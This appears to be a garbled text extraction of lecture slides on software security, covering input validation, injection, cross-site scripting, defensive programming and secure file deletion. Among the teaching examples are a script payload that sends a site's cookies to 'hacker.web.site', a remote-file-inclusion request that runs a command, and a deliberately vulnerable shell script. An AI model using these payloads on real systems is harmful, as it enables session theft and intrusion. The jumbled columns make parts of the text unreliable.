Académique Documents
Professionnel Documents
Culture Documents
Software Security
Software Security Issues
Many vulnerabilities
result from poor
programming
practices
Consequence from Software error
categories:
insufficient checking
Insecure interaction between
and validation of data components
and error codes Risky resource management
o Awareness of these issues is Porous defenses
a critical initial step in writing
more secure program code
Table
11.1
CWE/S
ANS
TOP 25
Most
Dange
rous
Softwa
re
Errors
(2011)
Software Security,
Quality and Reliability
Software quality and Software security:
o Attacker chooses probability
reliability: distribution, specifically
o Concerned with the targeting bugs that result in
accidental failure of program a failure that can be
as a result of some
exploited by the attacker
theoretically random,
unanticipated input, system o Triggered by inputs that
interaction, or use of differ dramatically from what
incorrect code is usually expected
o Improve using structured o Unlikely to be identified by
design and testing to identify common testing approaches
and eliminate as many bugs
as possible from a program
o Concern is not how many
bugs, but how often they are
triggered
Defensive Programming
Designing and implementing software so that it
continues to function even when under attack
Requires attention to all aspects of program
execution, environment, and type of data it
processes
Software is able to detect erroneous conditions
resulting from some attack
Also referred to as secure programming
Key rule is to never assume anything, check all
assumptions and handle any possible error states
Computer System
Program
executing algorithm, Network Link
processing input data,
generating output
GUI Display
Operating System
Database
Machine Hardware
Explicitly
validate
Must identify all assumptions on
data sources size and type of
values before
use
Input Size & Buffer
Overflow
Programmers often make assumptions about the
maximum expected size of input
o Allocated buffer size is not confirmed
o Resulting in buffer overflow
Testing may not identify vulnerability
o Test inputs are unlikely to include large enough inputs to
trigger the overflow
Safe coding treats all input as dangerous
Interpretation of Program
Input
Program input may be binary or text
o Binary interpretation depends on encoding and is usually
application specific
There is an increasing variety of character sets
being used
o Care is needed to identify just which set is being used and
what characters are being read
Failure to validate may result in an exploitable
vulnerability
2014 Heartbleed OpenSSL bug is a recent
example of a failure to check the validity
of a binary input value
Injection Attacks
Flaws relating to invalid handling of input data,
specifically when program input data can
accidentally or deliberately influence the flow of
execution of the program
<html><head><title>Finger User</title></head><body>
<h1>Finger User</h1>
<form method=post action="finger.cgi">
<b>Username to finger</b>: <input type=text name=user value="">
<p><input type=submit value="Finger User">
</form></body></html>
Fi nger User
Login Name TTY Idle Login Time Where
lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine
Fi nger User
attack success
-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi
-rw-r--r-- 1 lpb staff 251 Oct 21 16:14 finger.html
$name = $_REQUEST['name'];
$query = SELECT * FROM suppliers WHERE name = '" .
mysql_real_escape_string($name) . "';"
$result = mysql_query($query);
GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls
Commonly seen
in scripted Web Exploit XSS reflection
applications assumption that vulnerability
Attacks where Vulnerability involves all content from Attacker includes the
the inclusion of script
input provided code in the HTML
one site is malicious script
by one user is equally trusted content in data
content supplied to a site
subsequently Script code may need and hence is
output to to access data permitted to
associated with other
another user pages interact with
Browsers impose other content
security checks and from the site
restrict data access
to pages originating
from the same site
Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>
It is necessary
By only
to ensure that Alternative is
Input data accepting
data conform to compare the
should be known safe
with any input data with
compared data the
assumptions known
against what is program is
made about the dangerous
wanted more likely to
data before values
remain secure
subsequent use
Alternate Encodings
Growing requirement to
support users around the
May have multiple means of
globe and to interact with
encoding text
them using their own
languages
Security issues:
Correct algorithm implementation
Correct machine instructions for
algorithm
Valid manipulation of data
Correct Algorithm Implementation
Another variant is
Initial sequence when the
Issue of good
numbers used by programmers
program
many TCP/IP deliberately include
development
implementations are additional code in a
technique
too predictable program to help test
and debug it
Often code remains in
production release of a
program and could
Algorithm may not inappropriately release
correctly handle all Combination of the information
problem variants sequence number
as an identifier and May permit a user to
authenticator of bypass security checks
packets and the and perform actions
failure to make they would not
them sufficiently otherwise be allowed to
perform
Consequence of unpredictable
deficiency is a bug enables the attack
in the resulting to occur
This vulnerability was
program that could
exploited by the Morris
be exploited Internet Worm
Ensuring Machine Language Corresponds to
Algorithm
Issue is ignored by most programmers
o Assumption is that the compiler or interpreter generates or
executes code that validly implements the language
statements
Requires comparing machine code with
original source
o Slow and difficult
Memory leak
o Steady reduction in memory available on the heap to the point where it is
completely exhausted
Many older languages have no explicit support for
dynamic memory allocation
o Use standard library routines to allocate and release memory
#!/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
export PATH
user=`echo $1 | sed 's/@.*$//'`
grep $user /var/local/accounts/ipaddrs
Least privilege
Run programs with least privilege needed to complete their
function
Programmers make
assumptions about
their operation
Programs use system If incorrect behavior is not
what is expected
calls and standard May be a result of system
library functions for optimizing access to shared
resources
common operations Results in requests for
services being buffered,
resequenced, or otherwise
modified to optimize system
use
Optimizations can conflict with
program goals
patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, ]
open file for writing
for each pattern
seek to start of file
overwrite file contents with pattern
close file
remove file